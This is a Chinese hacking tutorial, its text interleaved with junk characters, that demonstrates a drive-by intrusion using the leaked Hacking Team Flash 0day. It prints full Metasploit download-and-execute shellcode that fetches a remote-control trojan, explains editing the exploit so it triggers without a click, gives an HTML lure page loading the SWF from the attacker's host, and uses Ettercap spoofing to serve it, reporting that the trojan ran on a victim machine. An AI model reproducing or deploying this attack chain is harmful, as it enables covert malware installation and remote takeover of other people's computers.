|
4 d, ^5 [' p+ I- F1 ~/ B 三、flash 0day之手工代码修改制作下载者实例入侵演示
) B( U1 @' r4 \. H) ^
' H9 f+ q' N/ T8 [' j# m
) L. s0 C6 s# s+ f+ K 利用到的工具: $ z( F- C; T' G1 a( p
% N0 S/ H- ]" f
: T9 o0 {' p2 U2 o0 x
Msf 4 M9 i$ ~$ s; F1 y# ], k4 o
, ~& s5 j4 A* a6 g w _- Q. t& @/ G
Ettercap
. {5 G2 o {" W4 {3 x3 `* C6 G$ T
. B- I/ ?2 f3 A% x7 [* E) n
2 g' P' C, C# W& P1 p$ |' j, E Adobe Flash CS6
/ F. a5 i- X% D / q+ b" v/ k9 M" n! h
1 E9 e8 Q+ U( _( U7 o; z Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ u6 t4 N3 s" p, W
' x7 W' f. h. ^4 D
- [/ O: I3 @" @! e1 h9 q 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 5 h. H' q) X c0 r. H" ~$ m
( ~, c0 f5 g$ a
" R A6 z2 p% C1 @8 Z2 O% B% ^( v 如图:
2 V0 e) m6 ]: S1 L) E + }: k8 o* Z! B/ A
' B2 Q, I/ W; j
$ H& ^$ {& L" M3 ]( ]( t: @9 D
' L" a% o7 U0 ` M+ f1 J( L) t3 a
1 \, V! L- P$ V( I+ M, ?+ R6 G
, h# ~2 J0 ]" F4 X0 u n7 ` _% _ " R o* B$ P! x/ E4 p
& {( f4 Q( C7 L- @
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' N2 [ Q+ n" a
) R- S3 p0 }9 o9 T& o7 H) ~8 n
7 m& ^, `& F3 N5 V: P F: l
( C+ K9 @8 F! z% e% k) f/ J0 ^
2 Z) e( X9 K" ?' e% ^! @* i( A# i& w- Z) ~( Z* n
1 \7 q, D# t4 Z" e
' x, @0 m, j" I+ D" a2 T4 O9 I
5 C5 `# B s. ~4 z$ ~ 然后执行generate -t dword生成shellcode,如下: " {* M9 D* i& I- d5 B1 c( A
: W3 M9 T5 ?) q) r `# O+ e9 e
# _8 q0 `) B5 _
* r. W" K% F+ v
: J1 {$ B! \1 ^0 u) R" K3 s4 ?# P N
复制代码到文本下便于我们一会编辑flash exp,如下:
$ @: U% N& d( [& f' Y# r+ N9 T! E! E / q1 f2 ^6 H, p: c& Q4 Q
, X* z; @2 R: Y# j/ g- | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / Q3 C% Z/ B6 T( Y, d d
4 L+ `: @4 W' P3 G
- D# M. R& x$ C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
E, g, U# n: M9 }7 h* H3 p 2 ?0 `" Z$ a9 @' b6 ^
$ E9 R- f2 d% ]2 D. z- Y/ d
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
5 u# X3 }: n0 i5 T" Y+ {" r
6 u; @% V# m3 B h5 B# K
5 p/ e( @: o7 c* ^9 S 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, R) _, [( _+ D, i, i
! ^& j3 {* p+ v8 D% s% p/ H) ]$ L! d6 `* B, h7 H
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
% i9 u: O- T5 \5 { u( r& m9 I# \
3 y: h5 O) P2 P, R, z( f& _4 B5 x t+ c! J1 V) b
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 4 @2 G4 } a. F8 v6 a
2 h. E: _& J+ D( ^1 f6 [
- H4 S4 n7 H2 L# v7 H7 p 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, % Q O# ?5 A8 S
`, `) k. d/ L: e3 }
7 G: [7 _5 h$ U* ~- c1 B0 a
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! H9 M9 a# A2 \
. F: }0 D% q ?/ X# A- b7 \4 u4 S1 W& z& ~; y6 ]8 X
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 e; P' J& Y# e- O
, h& J2 j* r1 m' n) ~( Q' _, \: s% @- g0 v- I+ X: ~; D3 H: f7 Z
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ! h! x( ~$ P3 [
( T$ ]5 f8 u. ~8 g' i) C: Y
2 F! \) E/ |$ [8 X: g# O" w$ M- B
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
; F2 I7 r% w% I* \9 {. M
- p, _3 z5 H. P7 Z
+ b4 J2 [2 \: S: V 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
3 A6 Y( z" S7 M
3 k/ p, p. z1 n
, `1 H) F* e9 P1 @ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, / l9 L8 } |0 S! j+ Z
( h" k( }0 O5 O
! m- Y7 J3 D2 b; R* a+ }) e' Q 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 " B8 N$ p7 y9 C2 y$ n! k% O
; k% n& R+ j: ?% |4 U6 `3 U
5 _: V4 ~+ j3 V/ O D( }, o 2 u! v. c1 ]% ?
* j* s; P4 x, d6 J$ ]: o* ^
% O/ k* h0 {3 b( r& c
& P3 Z' f* e( r9 B. w) z! X # k5 k" E8 }6 B/ v+ _
3 l D @3 m7 S. m& x4 o; S 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
6 D7 j4 \+ J% X2 p% S8 k' |8 { 3 F4 i. j1 x& x; u
. Z2 u! {, L/ q+ W9 N 8 {. g; x7 R b3 D7 L# T
& w" ~5 W f' p) {6 \5 B
J( ?: U8 l2 U t+ j7 `7 [
先修改ShellWin32.as,部分源代码如图: + L9 O7 p5 y/ L0 U0 X. z% R
: X- c5 C7 T- Q% b
+ N. p, i7 k0 P$ b d # ~* a8 Z' ?$ [4 K
; ^' f1 S! d- R2 F
# r# V, X8 v* U# N+ V( D4 \: i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
! N/ O' n h( |' T- e, v( p+ b# T
1 f( q6 J3 C, ^7 q+ j \8 C. v* U
X7 u" U; f4 C1 ?& A
; L& G6 Q8 U4 E8 f+ O2 }
0 W2 j4 i+ k7 F9 e, n( R }4 V5 @) t8 ]5 y
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 7 b& G5 o6 e! M) s4 a* K
: [; x8 ]+ H& y, s. M
6 a3 [0 h# C/ D
9 l" D9 B# `8 u
7 a D; s5 Q0 u, n
+ S& z' {* y5 x* S4 T! k: j. Y 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ! P3 X$ I) f' R
6 g ]% U- y, D. t
! e# ^+ n, f: F2 O/ g' [- ?4 |! f+ Z
0 K) d$ o9 G- x. r7 E, c) K& n- K
$ I! ?, w& A: }% t3 b: i. f" i) o. O) D& q' S7 @+ M' M8 ?( S
$ w$ ]$ f0 L% } 4 O: i: j4 H1 |
% I4 M* j$ M5 q, `( p3 F
; Y8 Z/ I, w' a& R8 M( l 2 [! T- r5 T; }- T8 _
3 |: m; x3 _+ E- l; n# ?
然后点保存,下面我们来编译一下,打开 - ]# w9 E' ?- q( g
! B) h# K% H0 b# e1 I# P# H) c; |) J
exp1.fla然后点文件-发布,看看编译没错误
5 G. l0 Z6 e' G# x6 d ; u8 J4 O. y. J" O- ^) B, B$ T. q
, \; _# r, O3 _# x. g3 [; P
9 R3 e8 E" Z! ]
0 d3 x& ~% p0 B' M9 ~) F3 h9 n4 M- z
, e$ I0 C a1 l J
) w" Z, c3 K- C8 t1 G7 Z2 ^7 I5 M3 e+ k, d4 H( w6 m4 B
, j& ^* C1 E' N" t0 k
. L/ `. x" Y- B8 a6 b: V
8 ^7 a7 |: ^$ C* H7 a4 N2 N& J8 t2 Y
r' U" e% G. W# U% M 3 @7 l1 c6 R/ }9 e
) K B! V( }2 G7 ]* W
然后我们把生成的
4 P6 I/ K- V2 @( u- h m; O
) t7 r( ~9 I; h* q" x+ T! J
# R2 f! P+ f; d6 b' n1 H7 ?$ U exp1.swf丢到kailinux 的/var/www/html下: ; P0 l; v, k- @: m
" c3 q. w, v: p& a& `; ^5 g# i4 ]8 V7 n- x# m, Z( Q. W
然后把这段代码好好编辑一下
& q% l. V- B# W7 x3 p0 b: b 7 f' F" J3 O. X& v0 V
( a. H1 W+ T& n
# L2 Y* W) j9 Q" g
( l$ G! [; [; G q7 H
1 R2 n- o4 c9 { z/ ^. Y
- Y4 N( M- R! s9 i
$ f5 _; Q! f- p3 i! G6 Y& L% k5 K: H. b1 y2 q( J
1 _+ V( [/ Y6 v) E% R }3 O
# i6 ~: }/ y, X
9 S8 \$ B- Z) n4 L 7 G% @) t# |! i, P
' X3 ^( l. I7 q8 T% A8 v( v8 y/ Z3 z* r( \$ h( K6 D
2 C* T5 K1 R( x1 l$ i% @$ D) J. r 9 R3 V( N. P+ `- W1 Z( z$ I0 Y
+ r# U: i9 j3 }: G0 Z8 N- o% @! Z2 L5 ~
! d# O) Q4 q& j2 E# E6 |, a0 S' N$ z
% L; G5 j- j6 m
6 q9 r: K, x& s$ r( r <!DOCTYPE html> , c8 Z$ E! w7 z: ?8 s( c4 }
0 H( y/ V8 A2 v3 ^5 F2 m
7 T3 X$ r) f+ r( ~, v/ a <html>
$ v" c2 K) w5 j* u8 w8 C! n
! j/ ~# \# i0 e/ x' r% q4 Z% ^9 D) G- v* Z3 b. }4 v; H; |# i
<head> % @& {- s+ a- @3 P0 W
( x% \+ V9 ~8 Z0 S5 n: P1 d( {
9 H( M5 d+ ^; T <meta http-equiv="Content-Type" content="text/html;
. S' Q2 z) X9 O5 e7 l6 [, d& }% ^ g* U& g( A. q3 h( t) t
3 w, v* o1 I; E* O0 x1 Z0 a- m charset=utf-8"/> 5 w4 k/ A8 S" D* D5 |
- N2 W# g! S9 r2 |/ R6 D7 P) P# _6 s+ v$ y- B; [/ z: A& Y
</head> # M. |" `! X& u( k! C8 U3 f
. n, K3 y$ R; n/ M& I- ?: w
# L8 U5 ?, V9 U( l <body>
! @2 j, g. w! V% p# w* M & v' `; e' U) V0 z4 E& F3 c3 i7 G
6 V0 R1 w, ~, |; m <h2> Please wait, the requested page is loading...</h2> ; E: f1 P$ ^: r7 D% f2 o- o: D% v7 z
+ U, P7 r, _4 N
+ S$ o" g' x8 Y" P( r <br> 1 E8 W7 I( b1 k" Y9 j
! [& K, C# K" U* Q1 J! O
# f- x" X: @6 U* r <OBJECT
" u& M: g a% I - m3 m9 E6 E$ N6 _
; k8 Y y k# \& V2 `1 v" B, Y$ v
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie : B& Y: W$ j7 e1 |3 ?8 I" X, J. {
# k9 S, K8 Q4 m; \8 {: Y$ [
/ l' F$ s8 @# L+ f VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 6 {; e3 q5 c+ i, V9 S" l% r
1 c: \$ ~7 n( Q
5 f- ^ i R* x7 Q7 J
</body>
; [2 M+ i5 g9 n/ n q# K: G$ { : q& w! E5 T. R; s* X: s
+ F) v7 Y N- G
<script> 5 e! l9 c w+ p7 p; p% I
2 u4 H& a, ^* N7 T$ C
$ P; Q# x k4 z. L setTimeout(function () {
( ]8 g( e+ V, @5 G
- |1 R5 o6 T% l) }- F N9 g1 j5 G/ a) M1 N/ W) c
4 L7 Y$ J2 {6 ^8 G " Q' T! N4 k8 Q3 k: i
: J- ?( H! j4 f8 l& X& E( b; p; g0 q
window.location.reload();
4 W8 ~$ I. A) ]' ]& U ' k4 z6 n& z( Y* \8 V5 }
4 H7 ?3 }# W* V( k+ h% j M3 L }, 10000);
9 p; d; ^2 l1 q ) D: g0 c0 E) K
$ Z' {: D, N& p/ l6 ^ . o' e# e3 r4 L: w1 q! q
# K& C+ h$ p; k% f" a, }
6 ^1 x# ~; C* q6 l; X- k8 \8 \. K! o$ W </script> # ]' A- @8 z1 t7 J% d4 u2 \& i: U, y
x" A k; \$ _" d( ~4 _7 t" }
( e! f3 Q, ]+ r0 Q! ~8 H7 X, Z8 x4 |
</html>
# N v- \. f1 F& M1 P6 B9 r' o; e5 x
1 ~1 E( z4 `. }, R* B Z8 J* p& r' q. ~* ]0 ]8 `
5 H% j+ D9 B) Z$ K d
0 w% R) y% J* S* Y/ V' B2 Y# e) }! [, Z, l/ m- C
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 9 m8 a3 z$ U D
" u/ d+ Q& s1 ^& W( V3 ]. c; S' q! m/ n: K8 N9 l8 A
7 Y8 \6 w# @3 _( J, O / h6 E( f2 [+ G
7 J- K# w( d5 }: ]$ e ; M% b$ b# X5 U1 W% U+ C$ i) R+ `+ `# u
2 U; i$ E& g5 t) C, O) X
1 V3 a- I& p4 z) Z ^0 k# f$ e6 _8 V
! w2 d% j- w @! i
- z r- v3 \3 X$ O( V 6 _+ @" s" Z4 X3 q# [
6 W% }1 L( |, w" |
" F, h* f9 ^! z" P0 b: x6 a- r # h: B9 p# V4 K
9 V. D2 ] x* R
& A% F" T4 s9 C! A4 W 下面我们用ettercap欺骗如图: 9 A0 \# e0 ~- W4 d- f/ l$ g
3 F- u9 ?) ~: G$ s) l$ m; |- C9 j6 |8 I: `4 k9 p
9 \( v, Z3 d: v; d2 D: v/ _
* i. u+ b& g' e7 z/ g6 D, X6 Q" q% \8 c! h$ b" v' u6 v
4 g& P1 W/ C1 t" a3 R( \* { L
$ X) h4 W# I2 o$ I# A
& u* U; y( G |. c" H8 w$ o 下面我们随便访问个网站看看: , t2 ^0 L% _& O) }! G& }
! H7 _/ @" d @2 g( N4 s! r3 T/ m" a7 P4 U8 ~1 k% z
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
! x- I, Z7 m7 Z4 n' s' k2 l , g1 W. P% }; ^6 s
1 n. J" b4 y% a: ?/ t* D
1 V6 h( i7 v: Y& x9 c- @3 Y$ q 0 m5 F' y* o0 {$ U$ D
, S/ Y0 y6 x2 T 我们看另一台,
O- ?' C7 w, `" ]$ I
4 }- u1 O( T3 i' D" c, H. O# S4 d% H, ], K# i5 a1 T
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 6 _4 j6 F! Y6 ~' b0 A$ O& Y
|